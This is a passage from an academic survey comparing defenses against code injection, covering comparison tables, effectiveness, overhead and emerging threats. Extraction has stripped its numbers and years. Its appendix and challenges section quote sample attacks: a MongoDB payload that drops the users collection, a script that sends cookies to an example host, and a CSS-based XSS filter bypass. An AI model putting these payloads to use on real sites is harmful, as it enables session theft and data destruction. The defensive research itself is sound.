have been used to detect various code defects. as we described earlier, lexical analysis is a simplistic approach that cannot be used to identify source code-driven injection attacks. even if a corresponding tool existed, the false alarms would be far too many. this is because source code-driven injection attacks are language independent (see ‘introduction and covered area’) and lexical analysis can only search for specific keywords or sequences of keywords. as a result, it is only used to detect code constructs that can lead to binary code injection attacks. in all other cases, the approaches are flexible and they can be used to deal with different kinds of attacks. for instance, policy enforcement is a method that seems to be tailored to prevent javascript injection attacks since it involves the interaction of two entities: the client’s browser and the server-side application (policies are set to the browser and are enforced on the client-side). notably, it can be also successfully employed to detect binary code injection via cfi mechanisms. effectiveness tests the effectiveness of security mechanisms can be judged by the existence of incorrect data, namely: false positives (fp) and false negatives (fn). specifically, a fp is a result that indicates that an attack is taking place, when it has not. a fn occurs when an attack actually takes place, and the mechanism fails to detect it. in tables and , we show if the researchers have performed any tests to evaluate the effectiveness of their proposed mechanisms in terms of fps and fns. if this is the case we put a tick mark ( ). if no tests were performed we put an x mark ( ). we see that there are many cases where no such tests were performed: out of in the case of static analysis and our of in the case of dynamic detection. a reasonable argument for the latter case, would be that defenses like jsflow (hedin et al., ), cowl (stefan et al., ) do not need to be fully validated through testing, because they provide systematic arguments as to why their design is secure. in order for this to stand though, their implementation should closely follow its specification, which may not be the case in practical terms. going one step further, we observed that there were cases such as xss-guard (bisht & venkatakrishnan, ) and the system by valeur, mutz & vigna ( ), where researchers mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table static analysis: comparison summary of tools designed to detect vulnerabilities that can lead to a code injection attack. approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd its (viega et al., ; viega et al., ) (c) ¬ binary code pscan (heffley & meunier, ) (c) ¬ binary code flawfinder (wilander & kamkar, ) (c) ¬ binary code rats (chess & mcgraw, ) ¬ binary code lexical analysis boon (wagner et al., ) (c) ¬ binary code codesurfer (anderson & zarins, ; nagy & mancoridis, ) ¬ binary code splint (evans & larochelle, ) (c) ¬ binary code livshits & lam ( ) (java) ¬ sql, javascript findbugs (ayewah & pugh, ; hovemeyer & pugh, ; spacco, hovemeyer & pugh, ) (java) ¬ sql, javascript pixy (jovanovic, kruegel & kirda, ) ¬ sql, javascript xssdetect ¬ javascript data-flow analysis dahse & holz ( ) ¬ sql, javascript qed (martin & lam, ) (java) ¬ sql, javascript model checking fehnker, huuck & rödiger ( ) (c) ¬ binary code safeli (fu & qian, ) ¬ sql klee (cadar, dunbar & engler, ) (c) ¬ binary code kudzu [ ] ¬ javascript rubyx (chaudhuri & foster, ) (ruby) ¬ javascript mergepoint (avgerinos et al., ) (c) ¬ binary code symbolic execu- tion s (trinh, chu & jaffar, ) ¬ sql, javascript sql dom (mcclure & krüger, ) % sql safe query objects (cook & rai, ) (java) ? sql sqlj (eisenberg & melton, ) (java) ? sql sugarj (erdweg, ; erdweg et al., ) ? sql, xml wassermann & su ( ) sql type system extensions webssari (xie & aiken, ) (php) . % sql notes. aflexibility indicates if the approach can be adjusted in order to detect different categories. beffectiveness tests. this column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cimplementation independence indicates if the static analysis mechanism is tailored to a specific programming language. dcomputational overhead. this column shows the runtime overhead that the mechanism may add to the application. in the context of static analysis this can be measured in the case of the type system extension approach. note that the different results does not necessarily indicate that one mechanism is more effective than the other. this is because most of them were evaluated under different assumptions and settings. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table dynamic detection: comparison summary of mechanisms developed to counter code injection attacks. approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd sigfree (wang et al., ) (c) % binary code lift (qin et al., ) . % binary code haldar, chandra & franz ( ) (java) sql securifly (martin, livshits & lam, ) (java) – % sql, javascript xu, bhatkar & sekar ( ) % sql, javascript wasc (nanda, lam & chiueh, ) % javascript phpaspis (papagiannis, migli- avacca & pietzuch, ) (php) . × sql, javascript, php stock et al. ( ) javascript vogt et al. ( ) ? javascript jsflow (hedin et al., ) ? × javascript cowl (stefan et al., ) % sql, javascript runtime tainting bauer et al. ( ) ? % javascript sqlrand (boyd & keromytis, ) . ms sql smask (johns & beyerlein, ) ? sql, javascript noncespaces (gundy & chen, ) . % javascriptisr xjs (athanasopoulos et al., ) . – ms javascript dsi (nadji, saxena & song, ) . % javascript browsershield (reis et al., ) % javascript blueprint (louw & venkatakrish- nan, ) . % javascript corescript (yu et al., ) ? javascript met (erlingsson, livshits & xie, ) ? javascript beep (jim, swamy & hicks, ) . % javascript csp (stamm, sterne & markham, ) ? javascript google caja ? javascript kiriansky, bruening & amaras- inghe, ( ) ? ∼ % binary code cfi (abadi et al., ; van der veen et al., ) (c) . – . % binary code cpi (kuznetsov et al., ) (c) . – . % binary code policy enforcement ccfi (mashtizadeh et al., ) (c) – % binary code (continued on next page) mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd amnesia (halfond & orso, b; halfond & orso, ; halfond & orso, a) ? sql didafit (lee, low & wong, ) ? sql (valeur, mutz & vigna ( ) ms sql sqlguard (buehrer, weide & sivilotti, ) % sql diglossia (son, mckinley & shmatikov, ) % sql, nosql sdriver (mitropoulos & spinellis, ; mitropoulos, karakoidas & spinellis, ; mitropoulos et al., ) % sql, xpath nsign (mitropoulos et al., ) . % javascript sicilian (soni, budianto & saxena, ) . % javascript laranjeiro et al. (laranjeiro, vieira & madeira, ; antunes et al., ; laranjeiro, vieira & madeira, ) sql, xpath mattos, santin & malucelli ( ) ? xml, xpath swap (wurzinger et al., ) ∼ % javascript xssds (johns, engelmann & posegga, ) ? javascript whitelisting xss-guard (bisht & venkatakrishnan, ) – % javascript notes. aflexibility indicates if the approach can be adjusted in order to detect different categories. beffectiveness tests. this column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cimplementation independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. dcomputational overhead. this column shows the runtime overhead that the mechanism may add to the application. note that the different results do not necessarily indicate that one mechanism is more effective than the other. this is because most of them were evaluated under different assumptions and settings. performed tests to measure false alarms but they did not look for false negatives. notably, we observed that there are mechanisms that even if they seem effective, their testing might be really poor contrary to other schemes that may have false alarms, but have been tested thoroughly. for example, blueprint appears to be an effective solution to detect javascript injection attacks, but the corresponding publication includes only two test cases. on the other hand, dsi appears to have false positives and negatives, but it was evaluated on a set of , vulnerable web sites. an interesting observation involves the mechanisms that detect javascript injection attacks. unfortunately, most countermeasures, even if the corresponding publications state that they are accurate, are actually vulnerable to attacks that involve non-html elements (except for athanasopoulos et al., ). for instance, there are browsers that mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. treat postscript files as html. a malicious user can embed a script within a postscript file, upload it as a valid document and then use it to trigger the attack (barth, caballero & song, ) (also see the appendix). since most mechanisms require the presence of a document object model dom tree to detect an attack, in this case they will fail. notably, there are cases where the effectiveness of some mechanisms have been questioned. for example, sovarel, evans & paul ( ) have examined the effectiveness of isr and showed that an attacker may be able to circumvent the approach by determining the randomization key. furthermore, their results indicate that doing isr in a way that provides a certain degree of security against a motivated malicious user is not as easy as previously thought. in the same manner, zitser, lippmann & leek ( ) and wilander & kamkar ( ), have extensively tested and questioned some of the aforementioned tools that detect binary code injection attacks. implementation independence in the case of static analysis mechanisms, implementation independence indicates if a mechanism is developed based upon a specific programming language. for instance, all lexical analysis tools except for rats, only analyze applications written in the c programming language. still, rats, which can be used on other languages, does not find code injection vulnerabilities in any other language except for c. in the same manner, sqlj can only be used by java developers. in every case, we list the corresponding language. in the dynamic detection context, implementation independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. for instance, php aspis can detect various forms of cias that target applications written in php only. in the same manner, cfi mechanisms can only protect programs written in c. computational overhead the user’s experience is affected if a mechanism suffers from runtime overhead. take for example a mechanism from the dynamic detection category. if this mechanism adds significant overhead to the applications functionality, the application’s owner would consider it useless. in the static analysis context, this can be measured in the case of the type system extension approach since their use affects the application overall. in the table we list the overhead for every mechanism as stated in the original publication. if the publication mentions that the mechanism suffers from a runtime overheard but does not explicitly state the occurring overhead we use the x mark ( ). if the authors did not measure the overhead we use a question mark (?). note though that each number is an indication that has been computed under different assumptions and settings and it cannot be used to compare mechanisms directly (especially the ones coming from different categories). however, in cases like nsign and sicilian, this could be meaningful because both are mechanisms that wrap up the javascript engine of a browser. hence, both overheads are imposed on the execution time of the engine. note that the overhead is displayed in different manners (e.g., percentages, absolute numbers and more). in every case this indicates the cost due to the use of each mechanism. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for example, it may be due to some form of run-time checks. furthermore, depending on the approach, the cost may be incurred on different places: it may affect a server (e.g., cpu usage, response latency and more), it may affect the client, or both. a note on usability the value of a security mechanism as a practical tool depends on how easy it is to deploy it in a production setting. in the static analysis context, a mechanism should require minimum effort from the security auditor. observe that lexical analysis and data-flow analysis mechanisms are easy to use since the only thing that is needed to perform their analysis is the source code. note though that, based on simple assumptions and without considering context in any way lexical analysis could report every possible dangerous function call as a problem, no matter how carefully it is used in the program. hence, auditors must be experienced programmers in order to interpret the results of lexical analysis tools and they must regard them as as an aid in the code review process and not as a firm solution to find software vulnerabilities (cowan, ; zitser, group & leek, ). in addition, model checking and type system extensions require too much effort from the side of the auditor, either to write specifications, modify source code or learn new constructs (see ‘model checking’ and ‘type system extensions’). in the case of dynamic detection, usability involves the deployment of the mechanism. to determine the effort required to use the mechanism, we examined the mechanism’s description, its deployment, and its implementation details. one of our basic criteria was if developers are required to modify their code and if they do, to what extent. as an example, consider the mechanisms coming from the policy enforcement category. in most cases programmers should modify multiple software components to enable a mechanism. note also that mechanisms such as met and beep require modifications both on the server and the client-side. thus, it would not be easy for them to be adopted by browser vendors. in the same manner sqlrand imposes a major infrastructure overhead because it requires the integration of a proxy for the rdbms to detect sql injection attacks. in addition, the whitelisting mechanisms that detect dsl-driven injection attacks, require multiple source code modifications. in particular, to use amnesia, developers should modify every code fragment that involves the execution of a query. nevertheless, there are tools like sdriver, which minimize such modifications down to one line of code. emerging challenges there are several challenges which indicate that code injection attacks will continue to be an issue in the field of cyber security. first, attackers seem to find new ways to introduce malicious code into programs by using a variety of techniques. for instance, an attack called php object injection (poi) (dahse, krein & holz, ) does not directly involve the injection of code, but still achieves arbitrary code execution in the context of a php application through the injection of specially crafted objects (for example as part of cookies). when deserialized by the application, these objects result in arbitrary code execution. in a similar way, xcs (cross-channel scripting) (bojinov, bursztein & boneh, ; bojinov, bursztein & boneh, mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ) attacks are a prominent xss variation. in an xcs attack, an attacker utilizes a non-web channel to inject code. for example, there are several nas (network-attached storage) devices which allow unauthorized users to upload files via the smb protocol (server message block). a malicious user could upload a file with a filename that contains a well-crafted script. when a legitimate user connects over a web channel to the device to browse its contents, the device will send through an http response the list of all filenames, ncluding the malicious one which is going to be interpreted as a valid script by the browser. architectures that include modern technologies such as mongodb (http://www. mongodb.org/) could be vulnerable to complex attacks that may involve more than one subcategories as son, mckinley & shmatikov ( ) have pointed out. in particular, a javascript injection attack could be performed to change an sql-like mongodb query that is built dynamically based on user input. specifically, when using javascript, developers have to make sure that any variables that cross the php-to-javascript boundary are passed in the scope field of the mongocode class, (http://www.php.net/manual/en/class.mongocode.php) that is not interpolated into the javascript string. this can come up when using the mongodb::execute() method and clauses like $where and group-by. for example, suppose that javascript is used to greet a user in the database logs: <?php $username = $_post[ ’ username ’ ] ; $db−>e x ec u te ( " p r i n t ( ’ hello , $username ! ’ ) ; " ) ; ?> if attackers pass ’); db.users.drop(); print(’ as a username, they could actually delete the entire database. recent work indicates that code injection can also be used as an attack vector to exploit mobile applications (bao et al., ; jin et al., ). this is not surprising because even though there are slightly different components that interact in the context of mobile applications, programming vulnerabilities thay may lead to code injection can still show up. specifically, as jin et al. ( ) point out, vulnerable html -based mobile applications can be vulnerable to xss variations. such attacks could involve different channels to send malicous scripts to the user’s browser including d barcodes and wi-fi access points. conclusions code injection attacks can be divided into two classes: those that target binary executable code and those that target the source code of domain specific and dynamic languages. approaches that defend against source code injection attacks can be grouped into two major categories: static analysis mechanisms that detect code injection vulnerabilities, and dynamic detection approaches that prevent code injection attacks the moment they take place. tools coming from the static analysis category are mainly used during application development, while dynamic detection mechanisms are employed during production. we examined the defenses based on their flexibility, implementation independence, computational overhead, and effectiveness tests. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mongodb.org/ http://www.mongodb.org/ http://www.php.net/manual/en/class.mongocode.php http://dx.doi.org/ . /peerj-cs. we observed that researchers do not extensively test their mechanisms in terms of effectiveness. a reasonable explanation for this would be that some defenses do not need to be fully validated through testing, because researchers provide formal arguments as to why they are secure. however, this is true only if implementations closely follow the specification, which may not be the case in practical terms. notably, there are cases where the effectiveness of some mechanisms has been questioned (sovarel, evans & paul, ; zitser, lippmann & leek, ; wilander & kamkar, ). moreover, we saw that computational overheads are mostly computed and reported under different assumptions and settings, hence they cannot be used to compare mechanisms directly. overheads also depend on context: in interactive applications latency is important, whereas in a batch setting the important measure is throughput or the corresponding slowdown. by taking account the above it would be fair to compare the sicilian to nsign in terms of computational overhead, because they both wrap up the javascript engine of a browser to defend against xss attacks. nevertheless, it would be spurious to compare both of them to a mechanism that acts as a proxy on the server side to defend against the same threat (e.g., browsershield). we also found that most approaches are flexible, meaning that they can be used to counter different forms of code injection. for example, isr and whitelisting have been applied to counter all kinds of code injection attacks. this is not the case though with lexical analysis, which is used only to detect binary code injection vulnerabilities. approaches can be interdependent and they can borrow heavily from others. consider for instance runtime tainting and data-flow analysis. both examine the flow of data but in different ways: the former does so dynamically and the latter statically. for this reason though, methods can also share the same disadvantages. for example, the state explosion issue appears in both model checking and symbolic execution. currently, most defenses target a small number of attacks, but this will probably change in the future. specifically, a large amount of work has been done to prevent either sql and javascript-driven injection attacks. this makes sense, because these attacks are very common and can have a large impact. less effort has been put to develop approaches that can defend against xpath or xml injection attacks. as a result, there are few corresponding defenses. similarly, there is only one documented mechanism designed to detect php injection attacks, php aspis, and only one that prevents nosql injection attacks, diglossia. attacks and defenses are likely to evolve in the coming years. the driver will be new threats, such as the php object injection (poi) (dahse, krein & holz, ) attack, and cross-channel scripting (xcs), both discussed in ‘emerging challenges’ apart from the above, attackers seem to continuously find new ways to introduce malicious code to applications by using a variety of languages and techniques as we observed earlier (see ‘code injection attacks’ and ‘emerging challenges’. besides, there are several recent attempts to perform code injection on mobile applications (bao et al., ; jin et al., ) which will potentially lead to the development of context-aware defenses. we hope that our categorization, our analysis, and the findings of our research, will aid researchers and mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. practitioners to further study the code injection problem and develop more robust and effective defenses. acknowledgements we want to thank the reviewers for providing us with valuable suggestions and insightful comments. appendix. javascript injection attacks a javascript injection vulnerability is manifested when a web application accepts and redisplays data of uncertain origin without appropriate validation and filtering. such content can compromise the security of these applications and the privacy of their corresponding users. many web sites allow registered users to post data which are stored on the server-side (i.e., a third-party comment on a blog page). if attackers hide a script in such data, they could manipulate the browser of another user. for example consider the following code snippet: < s c r i p t type=" t e x t / j a v a s c r i p t "> document . l o c a t i o n = ’ http : / / host . example / cgi− bin / c o o k i e s t e a l i n g . c g i ? ’+ document . cookie </ s c r i p t > if a malicious user could post data containing the above script, web users visiting the page that contains this data could have their cookies stolen. through this script the attacker calls an external common gateway interface (cgi) script and passes all the cookies associated with the current document to it as an argument via the document.cookie property. a common but rough way to stop malicious behaviors like this is server-side code filtering (i.e., the server strips out the word ‘‘javascript’’ from any external source) (jim, swamy & hicks, ). still, there are many ways to bypass such defense mechanisms. for example, one could escape special characters to bypass simple filtering operations, or take advantage of issues in the implementation of cascading style sheets (css) rendering engines of browsers like microsoft internet explorer (versions prior to ). consider the case where an attacker manages to hide the following listing in the css of a web page: <div id=code s t y l e =" background : u r l ( ’ j a v a s c r i p t : e v a l ( document . a l l . code . foo ) ’ ) " foo=" a l e r t ( ’ xss ’ ) "></ div> the attacker utilizes the eval function and a newline character (‘‘java–newline–script’’) to bypass the security checks and manoeuvre browser to execute the code contained in the foo variable. this is done by using the document.all array that contains all of the elements within a document. attacks like the above take advantage of the fact that eval executes the code passed to it in the same environment as the function’s caller. malicious users can also use eval to mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assemble innocuous-looking parts into harmful strings that the protecting mechanisms of a web page would normally consider dangerous and remove (richards et al., ). furthermore, a javascript injection attack does not necessarily have to involve html elements. a malicious user can embed a script within a postscript file, upload it as a valid document and then use it to trigger the attack (barth, caballero & song, ). additional information and declarations funding this work was funded under action of the athens university of economics and business research center program for excellence and extroversion of the academic year / (ep- - : the ‘‘meta-life’’ of javascript). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: athens university of economics and business research center program: ep- - . competing interests the authors declare there are no competing interests. author contributions • dimitris mitropoulos analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • diomidis spinellis wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate, collect or analyse any raw data or code. references abadi m, budiu m, erlingsson u, ligatti j. . control-flow integrity. in: jaeger t, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – . abelson h, sussman gj. . structure and interpretation of computer programs. second edition. cambridge: mit press. abi-antoun m, wang d, torr p. . checking threat modeling data flow diagrams for implementation conformance and security. in: stirewalt k, ed. proceedings of the nd ieee/acm international conference on automated software engineering, ase’ . new york: acm, – . aho av, lam ms, sethi r, ullman jd. . compilers: principles, techniques, and tools. second edition. harlow, essex: addison-wesley longman publishing co., inc. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. anderson a. . a comparison of two privacy policy languages: epal and xacml. technical report. sun microsystems, inc., mountain view, ca, usa. anderson p, zarins m. . the codesurfer software understanding platform. in: cordy jr, gall h, maletic ji, eds. proceedings of the th international workshop on program comprehension, iwpc’ . washington, d.c.: ieee computer society, – . anderson rj. . security engineering: a guide to building dependable distributed systems. first edition. new york: john wiley & sons, inc. antunes n, laranjeiro n, vieira m, madeira h. . effective detection of sql/xpath injection vulnerabilities in web services. in: sarkar s, vin hm, zhao jl, eds. proceedings of the ieee international conference on services computing, scc’ . washington, d.c.: ieee computer society, – . athanasopoulos e, pappas v, krithinakis a, ligouras s, markatos ep, karagiannis t. . xjs: practical xss prevention for web application development. in: ousterhout j, ed. proceedings of the usenix conference on web application development, webapps’ . berkeley: usenix association, – . avancini a, ceccato m. . comparison and integration of genetic algorithms and dynamic symbolic execution for security testing of cross-site scripting vulnerabilities. information and software technology ( ): – doi . /j.infsof. . . . avgerinos t, rebert a, cha sk, brumley d. . enhancing symbolic execution with veritesting. in: jalote p, ed. proceedings of the th international conference on software engineering, icse . new york: acm, – . ayewah n, pugh w. . the google findbugs fixit. in: tonella p, ed. proceedings of the th international symposium on software testing and analysis, issta’ . new york: acm, – . baca d, carlsson b, lundberg l. . evaluating the cost reduction of static code analysis for software security. in: erlingsson Ú, pistoia m, eds. proceedings of the third acm sigplan workshop on programming languages and analysis for security, plas’ . new york: acm, – . bao w, yao w, zong m, wang d. . cross-site scripting attacks on android hybrid applications. in: proceedings of the international conference on cryptography, security and privacy, iccsp’ . new york: acm, – . barth a, caballero j, song d. . secure content sniffing for web browsers, or how to stop papers from reviewing themselves. in: sterritt r, ed. proceedings of the th ieee symposium on security and privacy. washington, d.c.: ieee computer society, – . bauer l, cai s, jia l, timothy p, michael s, yuan t. . run-time monitoring and formal analysis of information flows in chromium. in: tsudik g, perrig a, eds. network and distributed system security (ndss)’ , – february , san diego, ca, usa. reston: internet society. beyer d, henzinger ta, jhala r, majumdar r. . the software model checker blast: applications to software engineering. international journal on software tools for technology transfer ( ): – doi . /s - - -z. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /peerj-cs. bisht p, venkatakrishnan vn. . xss-guard: precise dynamic prevention of cross-site scripting attacks. in: zamboni d, ed. proceedings of the th international conference on detection of intrusions and malware, and vulnerability assessment, dimva’ . berlin: springer-verlag, – . bojinov h, bursztein e, boneh d. . xcs: cross channel scripting and its impact on web applications. in: al-shaer e, ed. proceedings of the th acm conference on computer and communications security. new york: acm, – . bojinov h, bursztein e, boneh d. . the emergence of cross channel scripting. communications of the acm ( ): – doi . / . . boujarwah as, saleh k, al-dallal j. . testing java programs using dynamic data flow analysis. in: carroll j, daminani e, haddad h, oppenheim d, eds. proceedings of the acm symposium on applied computing—volume , sac’ . new york: acm, – . boyd s, keromytis a. . sqlrand: preventing sql injection attacks. in: jakobsson m, yung m, zhou j, eds. proceedings of the nd applied cryptography and network security conference, acns’ . springer-verlag, – . bratus s, locasto me, patterson lsml, shubina a. . exploit programming: from buffer overflows to ‘‘weird machines’’ and theory of computation. j-login ( ): – . brown m, paller a. . secure software development: why the development world awoke to the challenge. information security technical report ( ): – doi . /j.istr. . . . buchanan e, roemer r, shacham h, savage s. . when good instructions go bad: generalizing return-oriented programming to risc. in: ning p, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – . buehrer g, weide bw, sivilotti pag. . using parse tree validation to prevent sql injection attacks. in: di nitto e, murphy al, eds. proceedings of the th international workshop on software engineering and middleware, sem’ . new york: acm, – . cadar c, dunbar d, engler d. . klee: unassisted and automatic generation of high-coverage tests for complex systems programs. in: draves r, van renesse r, eds. proceedings of the th usenix conference on operating systems design and implementation, osdi’ . berkeley: usenix association, – . cadar c, godefroid p, khurshid s, păsăreanu cs, sen k, tillmann n, visser w. . symbolic execution for software testing in practice: preliminary assessment. in: taylor rn, ed. proceedings of the rd international conference on software engineering, icse’ . new york: acm, – . cahoon b, mckinley ks. . data flow analysis for software prefetching linked data structures in java. in: valero m, ed. proceedings of the international conference on parallel architectures and compilation techniques, pact’ . washington, d.c.: ieee computer society, – . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.istr. . . http://dx.doi.org/ . /peerj-cs. cannings r, dwivedi h, lackey z. . hacking exposed web . : web . security secrets and solutions. new york: mcgraw-hill osborne media. cert. . cert vulnerability note vu online. available at http://www.kb.cert. org/vuls/id/ (accessed on january ). chaudhuri a, foster js. . symbolic security analysis of ruby-on-rails web applications. in: al-shaer e, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . chen h, wagner d. . mops: an infrastructure for examining security prop- erties of software. in: atluri v, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . chen k, wagner d. . large-scale analysis of format string vulnerabilities in debian linux. in: hicks m, ed. proceedings of the workshop on program- ming languages and analysis for security, plas’ . new york: acm, – doi . / . . chess b, mcgraw g. . static analysis for security. ieee security and privacy ( ): – doi . /msp. . . chess b, west j. . secure programming with static analysis. upper saddle river: addison-wesley professional. chlipala a. . static checking of dynamically-varying security policies in database- backed applications. in: arpaci-dusseau r, chen b, eds. proceedings of the th usenix conference on operating systems design and implementation, osdi’ . berkeley: usenix association, . chodorow k, dirolf m. . mongodb: the definitive guide. sebastopol: o’reilly media. clarke em, emerson ea, sifakis j. . model checking: algorithmic verification and debugging. communications of the acm ( ): – doi . / . . cook wr, rai s. . safe query objects: statically typed objects as remotely executable queries. in: roman g-c, ed. proceedings of the th international conference on soft- ware engineering, icse’ . new york: acm, – doi . /icse. . . corin r, manzano fa. . taint analysis of security code in the klee symbolic execution engine. in: chim tw, yuen th, eds. proceedings of the th international conference on information and communications security, icics’ . berlin: springer- verlag, – doi . / - - - - _ . cowan c. . software security for open-source systems. ieee security and privacy ( ): – doi . /msecp. . . cowan c, pu c, maier d, hintony h, walpole j, bakke p, beattie s, grier a, wagle p, zhang q. . stackguard: automatic adaptive detection and prevention of buffer- overflow attacks. in: proceedings of the th usenix security symposium. berkeley: usenix association, – . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.kb.cert.org/vuls/id/ http://www.kb.cert.org/vuls/id/ http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /icse. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /msecp. . http://dx.doi.org/ . /peerj-cs. dahse j, holz t. . static detection of second-order vulnerabilities in web applica- tions. in: fu k, ed. proceedings of the rd usenix security symposium. berkeley: usenix association, – . dahse j, krein n, holz t. . code reuse attacks in php: automated pop chain generation. in: ahn g-j, ed. proceedings of the st acm conference on computer and communications security. – doi . / . . das sk, kant k, zhang n. . handbook on securing cyber-physical critical infrastruc- ture. first edition. san francisco: morgan kaufmann publishers inc. de groef w, devriese d, nikiforakis n, piessens f. . flowfox: a web browser with flexible and precise information flow control. in: yu t, ed. proceedings of the acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . denning de, denning pj. . certification of programs for secure information flow. communications of the acm ( ): – doi . / . . denning der. . an intrusion detection model. ieee transactions on software engineering ( ): – doi . /tse. . . dhawan m, ganapathy v. . analyzing information flow in javascript-based browser extensions. in: proceedings of the annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, – doi . /acsac. . . doupé a, cui w, jakubowski mh, peinado m, kruegel c, vigna g. . dedacota: toward preventing server-side xss via automatic code and data separation. in: proceedings of the acm conference on computer and communications security, ccs’ . new york: acm, – . dybvig rk. . the scheme programming language. fourth edition. cambridge: mit press. egele m, wurzinger p, kruegel c, kirda e. . defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. in: flegel u, bruschi d, eds. proceedings of the th international conference on detection of intrusions and malware, and vulnerability assessment, dimva’ . berlin: springer-verlag, – doi . / - - - - _ . eisenberg a, melton j. . sqlj part : sql routines using the java programming lan- guage. newsletter, acm sigmod record ( ): – doi . / . . erdweg s. . extensible languages for flexible and principled domain abstraction. phd thesis, philipps-universitat marburg. erdweg s, kats lcl, rendel t, kästner c, ostermann k, visser e. . library- based model-driven software development with sugarj. in: proceedings of the acm international conference companion on object oriented programming systems languages and applications companion, splash’ . new york: acm, – doi . / . . erlingsson Ú, livshits b, xie y. . end-to-end web application security. in: hunt g, ed. proceedings of the th usenix workshop on hot topics in operating systems. berkeley: usenix association, : – : . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /acsac. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. evans d, larochelle d. . improving security using extensible lightweight static analysis. ieee software ( ): – doi . / . . fagan me. . design and code inspections to reduce errors in program development. ibm systems journal ( – ): – doi . /sj. . . fazzini m, saxena p, orso a. . autocsp: automatically retrofitting csp to web applications. in: bertolino a, ed. proceedings of the th international conference on software engineering, icse’ . new york: acm. fehnker a, huuck r, rödiger w. . model checking dataflow for malicious input. in: proceedings of the workshop on embedded systems security, wess’ . new york: acm, : – : . fisher m, ellis j, bruce j. . jdbc api tutorial and reference. third edition. boston: addison wesley. fosdick ld, osterweil lj. . data flow analysis in software reliability. acm comput- ing surveys ( ): – doi . / . . francillon a, castelluccia c. . code injection attacks on harvard-architecture devices. in: ning p, ed. proceedings of the th acm conference on computer and com- munications security, ccs’ . new york: acm, – doi . / . . fu x, qian k. . safeli: sql injection scanner using symbolic execution. in: pro- ceedings of the workshop on testing, analysis, and verification of web services and applications, tav-web’ . new york: acm, – doi . / . . göktas e, athanasopoulos e, bos h, portokalidis g. . out of control: overcoming control-flow integrity. in: proceedings of the ieee symposium on security and pri- vacy. washington, d.c.: ieee computer society, – doi . /sp. . . gregoire j, buyens k, win bd, scandariato r, joosen w. . on the secure software development process: clasp and sdl compared. in: proceedings of the third inter- national workshop on software engineering for secure systems, sess’ . washington, d.c.: ieee computer society, doi . /j.infsof. . . . gundy mv, chen h. . noncespaces: using randomization to enforce information flow tracking and thwart cross-site scripting attacks. in: proceedings of the th annual network and distributed system security symposium (ndss). san diego. haldar v, chandra d, franz m. . dynamic taint propagation for java. in: pro- ceedings of the st annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, – doi . /csac. . . halfond wg, viegas j, orso a. . a classification of sql-injection attacks and countermeasures. in: proceedings of the international symposium on secure software engineering. halfond w. gj, orso a. a. amnesia: analysis and monitoring for neutralizing sql-injection attacks. in: proceedings of the th ieee/acm international conference on automated software engineering, ase’ . new york: acm, – . halfond wgj, orso a. b. combining static analysis and runtime moni- toring to counter sql-injection attacks. in: proceedings of the third interna- tional workshop on dynamic analysis, woda’ . new york: acm press, – doi . / . . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /sj. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /sp. . http://dx.doi.org/ . 